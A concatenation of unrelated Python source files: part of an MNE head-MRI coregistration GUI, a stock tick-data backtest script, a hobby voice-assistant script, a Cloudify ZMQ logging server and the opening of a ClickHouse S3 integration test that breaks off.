tooltip="Save the trans file and (if "
"scaling is enabled) the scaled MRI"),
Item('reset_params', tooltip="Reset all "
"coregistration parameters"),
show_labels=False),
Item('queue_feedback', style='readonly'),
Item('queue_current', style='readonly'),
Item('queue_len_str', style='readonly'),
show_labels=False),
kind='panel', buttons=[UndoButton])
def __init__(self, *args, **kwargs):
super(CoregPanel, self).__init__(*args, **kwargs)
# setup save worker
def worker():
while True:
desc, cmd, args, kwargs = self.queue.get()
self.queue_len -= 1
self.queue_current = 'Processing: %s' % desc
# task
try:
cmd(*args, **kwargs)
except Exception as err:
self.error = str(err)
res = "Error in %s"
else:
res = "Done: %s"
# finalize
self.queue_current = ''
self.queue_feedback = res % desc
self.queue.task_done()
t = Thread(target=worker)
t.daemon = True
t.start()
@cached_property
def _get_queue_len_str(self):
if self.queue_len:
return "Queue length: %i" % self.queue_len
else:
return ''
@cached_property
def _get_rotation(self):
rot = np.array([self.rot_x, self.rot_y, self.rot_z])
return rot
@cached_property
def _get_src_pts(self):
return self.hsp_pts - self.hsp_fid[0]
@cached_property
def _get_src_fid(self):
return self.hsp_fid - self.hsp_fid[0]
@cached_property
def _get_tgt_origin(self):
return self.mri_fid[0] * self.scale
@cached_property
def _get_tgt_pts(self):
pts = self.mri_pts * self.scale
pts -= self.tgt_origin
return pts
@cached_property
def _get_tgt_fid(self):
fid = self.mri_fid * self.scale
fid -= self.tgt_origin
return fid
@cached_property
def _get_translation(self):
trans = np.array([self.trans_x, self.trans_y, self.trans_z])
return trans
def _fit_ap_fired(self):
GUI.set_busy()
self.model.fit_auricular_points()
GUI.set_busy(False)
def _fit_fid_fired(self):
GUI.set_busy()
self.model.fit_fiducials()
GUI.set_busy(False)
def _fit_hsp_points_fired(self):
GUI.set_busy()
self.model.fit_hsp_points()
GUI.set_busy(False)
def _fits_ap_fired(self):
GUI.set_busy()
self.model.fit_scale_auricular_points()
GUI.set_busy(False)
def _fits_fid_fired(self):
GUI.set_busy()
self.model.fit_scale_fiducials()
GUI.set_busy(False)
def _fits_hsp_points_fired(self):
GUI.set_busy()
self.model.fit_scale_hsp_points()
GUI.set_busy(False)
def _n_scale_params_changed(self, new):
if not new:
return
# Make sure that MNE_ROOT environment variable is set
if not set_mne_root(True):
err = ("MNE_ROOT environment variable could not be set. "
"You will be able to scale MRIs, but the "
"mne_prepare_bem_model tool will fail. Please install "
"MNE.")
warning(None, err, "MNE_ROOT Not Set")
def _reset_params_fired(self):
self.model.reset()
def _rot_x_dec_fired(self):
self.rot_x -= self.rot_step
def _rot_x_inc_fired(self):
self.rot_x += self.rot_step
def _rot_y_dec_fired(self):
self.rot_y -= self.rot_step
def _rot_y_inc_fired(self):
self.rot_y += self.rot_step
def _rot_z_dec_fired(self):
self.rot_z -= self.rot_step
def _rot_z_inc_fired(self):
self.rot_z += self.rot_step
def _load_trans_fired(self):
# find trans file destination
raw_dir = os.path.dirname(self.model.hsp.file)
subject = self.model.mri.subject
trans_file = trans_fname.format(raw_dir=raw_dir, subject=subject)
dlg = FileDialog(action="open", wildcard=trans_wildcard,
default_path=trans_file)
dlg.open()
if dlg.return_code != OK:
return
trans_file = dlg.path
self.model.load_trans(trans_file)
def _save_fired(self):
if self.n_scale_params:
subjects_dir = self.model.mri.subjects_dir
subject_from = self.model.mri.subject
subject_to = self.model.raw_subject or self.model.mri.subject
else:
subject_to = self.model.mri.subject
# ask for target subject
if self.n_scale_params:
mridlg = NewMriDialog(subjects_dir=subjects_dir,
subject_from=subject_from,
subject_to=subject_to)
ui = mridlg.edit_traits(kind='modal')
if ui.result != True: # noqa
return
subject_to = mridlg.subject_to
# find bem file to run mne_prepare_bem_model
if self.can_prepare_bem_model and self.prepare_bem_model:
bem_job = self.model.get_prepare_bem_model_job(subject_to)
else:
bem_job = None
# find trans file destination
raw_dir = os.path.dirname(self.model.hsp.file)
trans_file = trans_fname.format(raw_dir=raw_dir, subject=subject_to)
dlg = FileDialog(action="save as", wildcard=trans_wildcard,
default_path=trans_file)
dlg.open()
if dlg.return_code != OK:
return
trans_file = dlg.path
if not trans_file.endswith('.fif'):
trans_file = trans_file + '.fif'
if os.path.exists(trans_file):
answer = confirm(None, "The file %r already exists. Should it "
"be replaced?", "Overwrite File?")
if answer != YES:
return
# save the trans file
try:
self.model.save_trans(trans_file)
except Exception as e:
error(None, str(e), "Error Saving Trans File")
return
# save the scaled MRI
if self.n_scale_params:
job = self.model.get_scaling_job(subject_to)
self.queue.put(job)
self.queue_len += 1
if bem_job is not None:
self.queue.put(bem_job)
self.queue_len += 1
def _scale_x_dec_fired(self):
step = 1. / self.scale_step
self.scale_x *= step
def _scale_x_inc_fired(self):
self.scale_x *= self.scale_step
def _scale_x_changed(self, old, new):
if self.n_scale_params == 1:
self.scale_y = new
self.scale_z = new
def _scale_y_dec_fired(self):
step = 1. / self.scale_step
self.scale_y *= step
def _scale_y_inc_fired(self):
self.scale_y *= self.scale_step
def _scale_z_dec_fired(self):
step = 1. / self.scale_step
self.scale_z *= step
def _scale_z_inc_fired(self):
self.scale_z *= self.scale_step
def _trans_x_dec_fired(self):
self.trans_x -= self.trans_step
def _trans_x_inc_fired(self):
self.trans_x += self.trans_step
def _trans_y_dec_fired(self):
self.trans_y -= self.trans_step
def _trans_y_inc_fired(self):
self.trans_y += self.trans_step
def _trans_z_dec_fired(self):
self.trans_z -= self.trans_step
def _trans_z_inc_fired(self):
self.trans_z += self.trans_step
class NewMriDialog(HasPrivateTraits):
# Dialog to determine target subject name for a scaled MRI
subjects_dir = Directory
subject_to = Str
subject_from = Str
subject_to_dir = Property(depends_on=['subjects_dir', 'subject_to'])
subject_to_exists = Property(Bool, depends_on='subject_to_dir')
feedback = Str(' ' * 100)
can_overwrite = Bool
overwrite = Bool
can_save = Bool
view = View(Item('subject_to', label='New MRI Subject Name', tooltip="A "
"new folder with this name will be created in the "
"current subjects_dir for the scaled MRI files"),
Item('feedback', show_label=False, style='readonly'),
Item('overwrite', enabled_when='can_overwrite', tooltip="If a "
"subject with the chosen name exists, delete the old "
"subject"),
width=500,
buttons=[CancelButton,
Action(name='OK', enabled_when='can_save')])
def _can_overwrite_changed(self, new):
if not new:
self.overwrite = False
@cached_property
def _get_subject_to_dir(self):
return os.path.join(self.subjects_dir, self.subject_to)
@cached_property
def _get_subject_to_exists(self):
if not self.subject_to:
return False
elif os.path.exists(self.subject_to_dir):
return True
else:
return False
@on_trait_change('subject_to_dir,overwrite')
def update_dialog(self):
if not self.subject_to:
self.feedback = "No subject specified..."
self.can_save = False
self.can_overwrite = False
elif self.subject_to == self.subject_from:
self.feedback = "Must be different from MRI source subject..."
self.can_save = False
self.can_overwrite = False
elif self.subject_to_exists:
if self.overwrite:
self.feedback = "%s will be overwritten." % self.subject_to
self.can_save = True
self.can_overwrite = True
else:
self.feedback = "Subject already exists..."
self.can_save = False
self.can_overwrite = True
else:
self.feedback = "Name ok."
self.can_save = True
self.can_overwrite = False
def _make_view(tabbed=False, split=False, scene_width=-1):
"""Create a view for the CoregFrame
Parameters
----------
tabbed : bool
Combine the data source panel and the coregistration panel into a
single panel with tabs.
split : bool
Split the main panels with a movable splitter (good for QT4 but
unnecessary for wx backend).
scene_width : int
Specify a minimum width for the 3d scene (in pixels).
returns
-------
view : traits View
View object for the CoregFrame.
"""
view_options = VGroup(Item('headview', style='custom'), 'view_options',
show_border=True, show_labels=False, label='View')
scene = VGroup(Item('scene', show_label=False,
editor=SceneEditor(scene_class=MayaviScene),
dock='vertical', width=500),
view_options)
data_panel = VGroup(VGroup(Item('subject_panel', style='custom'),
label="MRI Subject", show_border=True,
show_labels=False),
VGroup(Item('lock_fiducials', style='custom',
editor=EnumEditor(cols=2,
values={False: '2:Edit',
True: '1:Lock'}),
enabled_when='fid_ok'),
HGroup('hsp_always_visible',
Label("Always Show Head Shape Points"),
show_labels=False),
Item('fid_panel', style='custom'),
label="MRI Fiducials", show_border=True,
show_labels=False),
VGroup(Item('raw_src', style="custom"),
HGroup(Item('distance', show_label=True),
'omit_points', 'reset_omit_points',
show_labels=False),
Item('omitted_info', style='readonly',
show_label=False),
label='Head Shape Source (Raw)',
show_border=True, show_labels=False),
show_labels=False, label="Data Source")
coreg_panel = VGroup(Item('coreg_panel', style='custom'),
label="Coregistration", show_border=True,
show_labels=False,
enabled_when="fid_panel.locked")
if split:
main_layout = 'split'
else:
main_layout = 'normal'
if tabbed:
main = HGroup(scene,
Group(data_panel, coreg_panel, show_labels=False,
layout='tabbed'),
layout=main_layout)
else:
main = HGroup(data_panel, scene, coreg_panel, show_labels=False,
layout=main_layout)
view = View(main, resizable=True, handler=CoregFrameHandler(),
buttons=NoButtons)
return view
class ViewOptionsPanel(HasTraits):
mri_obj = Instance(SurfaceObject)
hsp_obj = Instance(PointObject)
view = View(VGroup(Item('mri_obj', style='custom', # show_border=True,
label="MRI Head Surface"),
Item('hsp_obj', style='custom', # show_border=True,
label="Head Shape Points")),
title="View Options")
class CoregFrame(HasTraits):
"""GUI for head-MRI coregistration
"""
model = Instance(CoregModel, ())
scene = Instance(MlabSceneModel, ())
headview = Instance(HeadViewController)
subject_panel = Instance(SubjectSelectorPanel)
fid_panel = Instance(FiducialsPanel)
coreg_panel = Instance(CoregPanel)
raw_src = DelegatesTo('model', 'hsp')
# Omit Points
distance = Float(5., label="Distance [mm]", desc="Maximal distance for "
"head shape points from MRI in mm")
omit_points = Button(label='Omit Points', desc="Omit head shape points "
"for the purpose of the automatic coregistration "
"procedure.")
reset_omit_points = Button(label='Reset Omission', desc="Reset the "
"omission of head shape points to include all.")
omitted_info = Property(Str, depends_on=['model.hsp.n_omitted'])
fid_ok = DelegatesTo('model', 'mri.fid_ok')
lock_fiducials = DelegatesTo('model')
hsp_always_visible = Bool(False, label="Always Show Head Shape")
# visualization
hsp_obj = Instance(PointObject)
mri_obj = Instance(SurfaceObject)
lpa_obj = Instance(PointObject)
nasion_obj = Instance(PointObject)
rpa_obj = Instance(PointObject)
hsp_lpa_obj = Instance(PointObject)
hsp_nasion_obj = Instance(PointObject)
hsp_rpa_obj = Instance(PointObject)
hsp_visible = Property(depends_on=['hsp_always_visible', 'lock_fiducials'])
view_options = Button(label="View Options")
picker = Instance(object)
view_options_panel = Instance(ViewOptionsPanel)
# Processing
queue = DelegatesTo('coreg_panel')
view = _make_view()
def _subject_panel_default(self):
return SubjectSelectorPanel(model=self.model.mri.subject_source)
def _fid_panel_default(self):
panel = FiducialsPanel(model=self.model.mri, headview=self.headview)
return panel
def _coreg_panel_default(self):
panel = CoregPanel(model=self.model)
return panel
def _headview_default(self):
return HeadViewController(scene=self.scene, system='RAS')
def __init__(self, raw=None, subject=None, subjects_dir=None):
super(CoregFrame, self).__init__()
subjects_dir = get_subjects_dir(subjects_dir)
if (subjects_dir is not None) and os.path.isdir(subjects_dir):
self.model.mri.subjects_dir = subjects_dir
if subject is not None:
self.model.mri.subject = subject
if raw is not None:
self.model.hsp.file = raw
@on_trait_change('scene.activated')
def _init_plot(self):
self.scene.disable_render = True
lpa_color = defaults['lpa_color']
nasion_color = defaults['nasion_color']
rpa_color = defaults['rpa_color']
# MRI scalp
color = defaults['mri_color']
self.mri_obj = SurfaceObject(points=self.model.transformed_mri_points,
color=color, tri=self.model.mri.tris,
scene=self.scene)
# on_trait_change was unreliable, so link it another way:
self.model.mri.on_trait_change(self._on_mri_src_change, 'tris')
self.model.sync_trait('transformed_mri_points', self.mri_obj, 'points',
mutual=False)
self.fid_panel.hsp_obj = self.mri_obj
# MRI Fiducials
point_scale = defaults['mri_fid_scale']
self.lpa_obj = PointObject(scene=self.scene, color=lpa_color,
point_scale=point_scale)
self.model.mri.sync_trait('lpa', self.lpa_obj, 'points', mutual=False)
self.model.sync_trait('scale', self.lpa_obj, 'trans', mutual=False)
self.nasion_obj = PointObject(scene=self.scene, color=nasion_color,
point_scale=point_scale)
self.model.mri.sync_trait('nasion', self.nasion_obj, 'points',
mutual=False)
self.model.sync_trait('scale', self.nasion_obj, 'trans', mutual=False)
self.rpa_obj = PointObject(scene=self.scene, color=rpa_color,
point_scale=point_scale)
self.model.mri.sync_trait('rpa', self.rpa_obj, 'points', mutual=False)
self.model.sync_trait('scale', self.rpa_obj, 'trans', mutual=False)
# Digitizer Head Shape
color = defaults['hsp_point_color']
point_scale = defaults['hsp_points_scale']
p = PointObject(view='cloud', scene=self.scene, color=color,
point_scale=point_scale, resolution=5)
self.hsp_obj = p
self.model.hsp.sync_trait('points', p, mutual=False)
self.model.sync_trait('head_mri_trans', p, 'trans', mutual=False)
self.sync_trait('hsp_visible', p, 'visible', mutual=False)
# Digitizer Fiducials
point_scale = defaults['hsp_fid_scale']
opacity = defaults['hsp_fid_opacity']
p = PointObject(scene=self.scene, color=lpa_color, opacity=opacity,
point_scale=point_scale)
self.hsp_lpa_obj = p
self.model.hsp.sync_trait('lpa', p, 'points', mutual=False)
self.model.sync_trait('head_mri_trans', p, 'trans', mutual=False)
self.sync_trait('hsp_visible', p, 'visible', mutual=False)
p = PointObject(scene=self.scene, color=nasion_color, opacity=opacity,
point_scale=point_scale)
self.hsp_nasion_obj = p
self.model.hsp.sync_trait('nasion', p, 'points', mutual=False)
self.model.sync_trait('head_mri_trans', p, 'trans', mutual=False)
self.sync_trait('hsp_visible', p, 'visible', mutual=False)
p = PointObject(scene=self.scene, color=rpa_color, opacity=opacity,
point_scale=point_scale)
self.hsp_rpa_obj = p
self.model.hsp.sync_trait('rpa', p, 'points', mutual=False)
self.model.sync_trait('head_mri_trans', p, 'trans', mutual=False)
self.sync_trait('hsp_visible', p, 'visible', mutual=False)
on_pick = self.scene.mayavi_scene.on_mouse_pick
if not _testing_mode():
self.picker = on_pick(self.fid_panel._on_pick, type='cell')
self.headview.left = True
self.scene.disable_render = False
self.view_options_panel = ViewOptionsPanel(mri_obj=self.mri_obj,
hsp_obj=self.hsp_obj)
@cached_property
def _get_hsp_visible(self):
return self.hsp_always_visible or self.lock_fiducials
@cached_property
def _get_omitted_info(self):
if self.model.hsp.n_omitted == 0:
return "No points omitted"
elif self.model.hsp.n_omitted == 1:
return "1 point omitted"
else:
return "%i points omitted" % self.model.hsp.n_omitted
def _omit_points_fired(self):
distance = self.distance / 1000.
self.model.omit_hsp_points(distance)
def _reset_omit_points_fired(self):
self.model.omit_hsp_points(0, True)
@on_trait_change('model.mri.tris')
def _on_mri_src_change(self):
if self.mri_obj is None:
return
if not (np.any(self.model.mri.points) and np.any(self.model.mri.tris)):
self.mri_obj.clear()
return
self.mri_obj.points = self.model.mri.points
self.mri_obj.tri = self.model.mri.tris
self.mri_obj.plot()
# automatically lock fiducials if a good fiducials file is loaded
@on_trait_change('model.mri.fid_file')
def _on_fid_file_loaded(self):
if self.model.mri.fid_file:
self.fid_panel.locked = True
else:
self.fid_panel.locked = False
def _view_options_fired(self):
self.view_options_panel.edit_traits()
|
backfinder.py
|
import os
import sys
import sqlite3
import pandas as pd
from multiprocessing import Process, Queue
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
from utility.setting import db_tick, db_backfind
from utility.static import now, strf_time, timedelta_sec, strp_time
class BackFinder:
def __init__(self, q_, code_list_, df_mt_):
self.q = q_
self.code_list = code_list_
self.df_mt = df_mt_
self.Start()
def Start(self):
conn = sqlite3.connect(db_tick)
tcount = len(self.code_list)
for k, code in enumerate(self.code_list):
columns = ['등락율', '시가대비등락율', '고저평균대비등락율', '거래대금', '누적거래대금', '전일거래량대비',
'체결강도', '체결강도차이', '거래대금차이', '전일거래량대비차이']
df_bf = pd.DataFrame(columns=columns)
avgtime = 300
count_cond = 0
df = pd.read_sql(f"SELECT * FROM '{code}'", conn)
df = df.set_index('index')
lasth = len(df) - 1
for h, index in enumerate(df.index):
try:
if code not in self.df_mt['거래대금상위100'][index]:
count_cond = 0
else:
count_cond += 1
except KeyError:
continue
if count_cond < avgtime:
continue
if strp_time('%Y%m%d%H%M%S', index) < \
timedelta_sec(180, strp_time('%Y%m%d%H%M%S', df['VI발동시간'][index])):
continue
if df['현재가'][index] >= df['상승VID5가격'][index]:
continue
if h >= lasth - avgtime:
break
if df['현재가'][h:h + avgtime].max() > df['현재가'][index] * 1.05:
per = df['등락율'][index]
oper = round((df['현재가'][index] / df['시가'][index] - 1) * 100, 2)
hper = df['고저평균대비등락율'][index]
sm = int(df['거래대금'][index])
dm = int(df['누적거래대금'][index])
vp = df['전일거래량대비'][index]
ch = df['체결강도'][index]
gap_ch = round(df['체결강도'][index] - df['체결강도'][h - avgtime:h].mean(), 2)
gap_sm = round(df['거래대금'][index] - df['거래대금'][h - avgtime:h].mean(), 2)
gap_vp = round(df['전일거래량대비'][index] - df['전일거래량대비'][h - avgtime:h].mean(), 2)
df_bf.at[code + index] = per, oper, hper, sm, dm, vp, ch, gap_ch, gap_sm, gap_vp
print(f' 백파인더 검색 중 ... [{k + 1}/{tcount}]')
self.q.put(df_bf)
conn.close()
class Total:
def __init__(self, q_, last_):
super().__init__()
self.q = q_
self.last = last_
self.Start()
def Start(self):
df = []
k = 0
while True:
data = self.q.get()
df.append(data)
k += 1
if k == self.last:
break
if len(df) > 0:
df = pd.concat(df)
conn = sqlite3.connect(db_backfind)
df.to_sql(f"{strf_time('%Y%m%d')}_tick", conn, if_exists='replace', chunksize=1000)
conn.close()
if __name__ == "__main__":
start = now()
q = Queue()
con = sqlite3.connect(db_tick)
df_name = pd.read_sql("SELECT name FROM sqlite_master WHERE TYPE = 'table'", con)
df_mt = pd.read_sql('SELECT * FROM moneytop', con)
df_mt = df_mt.set_index('index')
con.close()
table_list = list(df_name['name'].values)
table_list.remove('moneytop')
table_list.remove('codename')
last = len(table_list)
w = Process(target=Total, args=(q, last))
w.start()
procs = []
workcount = int(last / 6) + 1
for j in range(0, last, workcount):
code_list = table_list[j:j + workcount]
p = Process(target=BackFinder, args=(q, code_list, df_mt))
procs.append(p)
p.start()
for p in procs:
p.join()
w.join()
end = now()
print(f' 백파인더 소요시간 {end - start}')
|
voasst.py
|
#!/bin/zsh
# Description: Voice Assistant that could search the web and query Wolfram Alpha.
# importing speech recognition package from google api
import speech_recognition as sr
import playsound # to play saved mp3 file
from gtts import gTTS # google text to speech
import os # to save/open files
import wolframalpha # to calculate strings into formula
# from selenium import webdriver # to control browser operations
# from selenium.webdriver.chrome.options import Options
from threading import Thread
num = 1
def assistant_speaks(output):
global num
# num to rename every audio file
# with different name to remove ambiguity
num += 1
print("voasst : ", output)
toSpeak = gTTS(text = output, lang ='en', slow = False)
# saving the audio file given by google text to speech
file = str(num)+".mp3"
toSpeak.save(file)
# playsound package is used to play the same file.
playsound.playsound(file, True)
os.remove(file)
def get_audio():
rObject = sr.Recognizer()
audio = ''
with sr.Microphone() as source:
print("Speak...")
# recording the audio using speech recognition
audio = rObject.listen(source, phrase_time_limit = 5)
print("Stop.") # limit 5 secs
try:
text = rObject.recognize_google(audio, language ='en-US')
print("You : ", text)
return text
except:
assistant_speaks("Could not understand your audio, please try again!")
with sr.Microphone() as source:
print("Speak...")
# recording the audio using speech recognition
audio = rObject.listen(source, phrase_time_limit = 5)
print("Stop.") # limit 5 secs
text = rObject.recognize_google(audio, language ='en-US')
return text
def search_web(input):
driver_path = r"C:\webdriver\chromedriver.exe"
brave_path = r"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe"
opt = Options()
opt.binary_location = brave_path
# opt.add_argument("--incognito") OPTIONAL
# opt.add_argument("--headless") OPTIONAL
opt.add_argument('--start-maximized')
opt.add_experimental_option('excludeSwitches', ['enable-logging'])
opt.add_argument('--disable-blink-features=AutomationControlled')
driver = webdriver.Chrome(executable_path=driver_path, options=opt)
driver.implicitly_wait(1)
if 'youtube' in input.lower():
assistant_speaks("Opening in youtube")
indx = input.lower().split().index('youtube')
query = input.split()[indx + 1:]
driver.get("http://www.youtube.com/results?search_query =" + '+'.join(query))
return
elif 'wikipedia' in input.lower():
assistant_speaks("Opening Wikipedia")
indx = input.lower().split().index('wikipedia')
query = input.split()[indx + 1:]
driver.get("https://en.wikipedia.org/wiki/" + '_'.join(query))
return
else:
if 'google' in input:
indx = input.lower().split().index('google')
query = input.split()[indx + 1:]
driver.get("https://www.google.com/search?q =" + '+'.join(query))
elif 'search' in input:
indx = input.lower().split().index('google')
query = input.split()[indx + 1:]
driver.get("https://www.google.com/search?q =" + '+'.join(query))
else:
driver.get("https://www.google.com/search?q =" + '+'.join(input.split()))
return
# function used to open application present inside the system.
def open_application(input):
if "brave" in input:
assistant_speaks("Brave browser")
os.startfile(r"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe")
return
elif "word" in input:
assistant_speaks("Opening Microsoft Word")
os.startfile(r"C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE")
return
elif "excel" in input:
assistant_speaks("Opening Microsoft Excel")
os.startfile(r"C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE")
return
else:
assistant_speaks("Application not available")
return
def process_text(input):
try:
if 'search' in input or 'play' in input:
# a basic web crawler using selenium
search_web(input)
return
elif "who are you" in input or "define yourself" in input:
speak = '''Hello, I am Voasst. Your personal Assistant.
I am here to make your life easier. You can command me to perform
various tasks such as calculating sums or opening applications etcetra'''
assistant_speaks(speak)
return
elif "who made you" in input or "created you" in input:
speak = "I have been created by Eduardo Flores."
assistant_speaks(speak)
return
elif "calculate" in input.lower():
# write your wolframalpha app_id here
app_id = "WOLFRAMALPHA_APP_ID"
client = wolframalpha.Client(app_id)
indx = input.lower().split().index('calculate')
query = input.split()[indx + 1:]
res = client.query(' '.join(query))
answer = next(res.results).text
assistant_speaks("The answer is " + answer)
return
elif 'open' in input:
# another function to open
# different application availaible
open_application(input.lower())
return
else:
assistant_speaks("I can search the web for you, Do you want to continue?")
ans = get_audio()
if 'yes' in str(ans) or 'yeah' in str(ans):
search_web(input)
else:
return
except :
assistant_speaks("I don't understand, I can search the web for you, Do you want to continue?")
ans = get_audio()
if 'yes' in str(ans) or 'yeah' in str(ans):
search_web(input)
# Driver Code
def active_process():
if __name__ == "__main__":
assistant_speaks("What's your name, Human?")
# name ='Human'
name = get_audio()
assistant_speaks("Hello, " + name + '.')
while(1):
assistant_speaks("What can i do for you?")
text = get_audio().lower()
if text == 0:
continue
if "exit" in str(text) or "bye" in str(text) or "sleep" in str(text) or "stop" in str(text):
assistant_speaks("Ok bye, "+ name+'.')
break
# calling process text to process the query
process_text(text)
# t.daemon=True
Thread(target=active_process).start()
|
logging_server.py
|
########
# Copyright (c) 2015 GigaSpaces Technologies Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# * See the License for the specific language governing permissions and
# * limitations under the License.
from __future__ import absolute_import
import functools
import json
import logging
import logging.handlers
import os
import random
import threading
import tempfile
import zmq
from celery import bootsteps
from celery.bin import Option
from celery.utils.log import get_logger
from cloudify.proxy import server
from cloudify.lru_cache import lru_cache
logger = get_logger(__name__)
LOGFILE_SIZE_BYTES = 5 * 1024 * 1024
LOGFILE_BACKUP_COUNT = 5
def configure_app(app):
app.user_options['worker'].add(
Option('--with-logging-server', action='store_true',
default=False, help='Enable logging server'))
app.user_options['worker'].add(
Option('--logging-server-logdir', action='store',
help='logdir location'))
app.user_options['worker'].add(
Option('--logging-server-handler-cache-size', action='store',
type='int', default=100,
help='Maximum number of file handlers that can be open at any '
'given time'))
app.steps['worker'].add(ZMQLoggingServerBootstep)
class ZMQLoggingServerBootstep(bootsteps.StartStopStep):
label = 'logging server'
conditional = True
def __init__(self, worker,
with_logging_server=False,
logging_server_logdir=None,
logging_server_handler_cache_size=100,
**kwargs):
worker.logging_server = self
self.enabled = with_logging_server
self.logging_server = None
self.logdir = logging_server_logdir
self.cache_size = logging_server_handler_cache_size
self.thread = None
self.socket_url = None
def info(self, worker):
return {
'logging_server': {
'enabled': self.enabled,
'logdir': self.logdir,
'socket_url': self.socket_url,
'cache_size': self.cache_size
}
}
def start(self, worker):
log_prefix = '| {0}: {1}'.format(type(worker).__name__, self.label)
if not self.enabled:
logger.debug('{0}: enabled={1}'.format(log_prefix, self.enabled))
return
if not self.logdir:
raise ValueError('--logging-server-logdir must be supplied')
if os.name == 'nt':
self.socket_url = 'tcp://127.0.0.1:{0}'.format(
server.get_unused_port())
else:
suffix = '%05x' % random.randrange(16 ** 5)
self.socket_url = ('ipc://{0}/cloudify-logging-server-{1}.socket'
.format(tempfile.gettempdir(), suffix))
if not os.path.exists(self.logdir):
os.makedirs(self.logdir)
self.logging_server = ZMQLoggingServer(socket_url=self.socket_url,
logdir=self.logdir,
cache_size=self.cache_size)
self.thread = threading.Thread(target=self.logging_server.start)
self.thread.start()
logger.debug('{0}: enabled={1}, logdir={2}, socket_url={3}'
.format(log_prefix,
self.enabled,
self.logdir,
self.socket_url))
def _stop_logging_server(self, worker):
if not self.enabled:
return
self.logging_server.close()
stop = _stop_logging_server
close = _stop_logging_server
shutdown = _stop_logging_server
class ZMQLoggingServer(object):
def __init__(self, logdir, socket_url, cache_size):
self.closed = False
self.zmq_context = zmq.Context(io_threads=1)
self.socket = self.zmq_context.socket(zmq.PULL)
self.socket.bind(socket_url)
self.poller = zmq.Poller()
self.poller.register(self.socket, zmq.POLLIN)
self.logdir = logdir
# on the management server, log files are handled by logrotate
# with copytruncate so we use the simple FileHandler.
# on agent hosts, we want to rotate the logs using python's
# RotatingFileHandler.
if os.environ.get('MGMTWORKER_HOME'):
self.handler_func = logging.FileHandler
else:
self.handler_func = functools.partial(
logging.handlers.RotatingFileHandler,
maxBytes=LOGFILE_SIZE_BYTES,
backupCount=LOGFILE_BACKUP_COUNT)
# wrap the _get_handler method with an lru cache decorator
# so we only keep the last 'cache_size' used handlers in in turn
# have at most 'cache_size' file descriptors open
cache_decorator = lru_cache(maxsize=cache_size,
on_purge=lambda handler: handler.close())
self._get_handler = cache_decorator(self._get_handler)
def start(self):
while not self.closed:
try:
if self.poller.poll(1000):
message = json.loads(self.socket.recv(), encoding='utf-8')
self._process(message)
except Exception:
if not self.closed:
logger.warning('Error raised during record processing',
exc_info=True)
def close(self):
if not self.closed:
self.closed = True
self.socket.close()
self.zmq_context.term()
self._get_handler.clear()
def _process(self, entry):
handler = self._get_handler(entry['context'])
handler.emit(Record(entry['message']))
def _get_handler(self, handler_context):
logfile = os.path.join(self.logdir, '{0}.log'.format(handler_context))
handler = self.handler_func(logfile)
handler.setFormatter(Formatter)
return handler
class Record(object):
def __init__(self, message):
self.message = message
filename = None
lineno = None
class Formatter(object):
@staticmethod
def format(record):
return record.message
|
test.py
|
import gzip
import json
import logging
import os
import io
import random
import threading
import time
import helpers.client
import pytest
from helpers.cluster import ClickHouseCluster, ClickHouseInstance
logging.getLogger().setLevel(logging.INFO)
logging.getLogger().addHandler(logging.StreamHandler())
SCRIPT_DIR = os.path.dirname(os.path.realpath(__file__))
CONFIG_PATH = os.path.join(SCRIPT_DIR, './_instances/dummy/configs/config.d/defaultS3.xml')
# Creates S3 bucket for tests and allows anonymous read-write access to it.
def prepare_s3_bucket(cluster):
# Allows read-write access for bucket without authorization.
bucket_read_write_policy = {"Version": "2012-10-17",
"Statement": [
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:GetBucketLocation",
"Resource": "arn:aws:s3:::root"
},
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:ListBucket",
"Resource": "arn:aws:s3:::root"
},
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:GetObject",
"Resource": "arn:aws:s3:::root/*"
},
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:PutObject",
"Resource": "arn:aws:s3:::root/*"
}
]}
minio_client = cluster.minio_client
minio_client.set_bucket_policy(cluster.minio_bucket, json.dumps(bucket_read_write_policy))
cluster.minio_restricted_bucket = "{}-with-auth".format(cluster.minio_bucket)
if minio_client.bucket_exists(cluster.minio_restricted_bucket):
minio_client.remove_bucket(cluster.minio_restricted_bucket)
minio_client.make_bucket(cluster.minio_restricted_bucket)
def put_s3_file_content(cluster, bucket, filename, data):
buf = io.BytesIO(data)
cluster.minio_client.put_object(bucket, filename, buf, len(data))
# Returns content of given S3 file as string.
def get_s3_file_content(cluster, bucket, filename, decode=True):
# type: (ClickHouseCluster, str) -> str
data = cluster.minio_client.get_object(bucket, filename)
data_str = b""
for chunk in data.stream():
data_str += chunk
if decode:
return data_str.decode()
return data_str
@pytest.fixture(scope="module")
def cluster():
try:
cluster = ClickHouseCluster(__file__)
cluster.add_instance("restricted_dummy", main_configs=["configs/config_for_test_remote_host_filter.xml"],
with_minio=True)
cluster.add_instance("dummy", with_minio=True, main_configs=["configs/defaultS3.xml"])
cluster.add_instance("s3_max_redirects", with_minio=True, main_configs=["configs/defaultS3.xml"],
user_configs=["configs/s3_max_redirects.xml"])
logging.info("Starting cluster...")
cluster.start()
logging.info("Cluster started")
prepare_s3_bucket(cluster)
logging.info("S3 bucket created")
run_s3_mock(cluster)
yield cluster
finally:
cluster.shutdown()
def run_query(instance, query, stdin=None, settings=None):
# type: (ClickHouseInstance, str, object, dict) -> str
logging.info("Running query '{}'...".format(query))
result = instance.query(query, stdin=stdin, settings=settings)
logging.info("Query finished")
return result
# Test simple put.
@pytest.mark.parametrize("maybe_auth,positive", [
("", True),
("'minio','minio123',", True),
("'wrongid','wrongkey',", False)
])
def test_put(cluster, maybe_auth, positive):
# type: (ClickHouseCluster) -> None
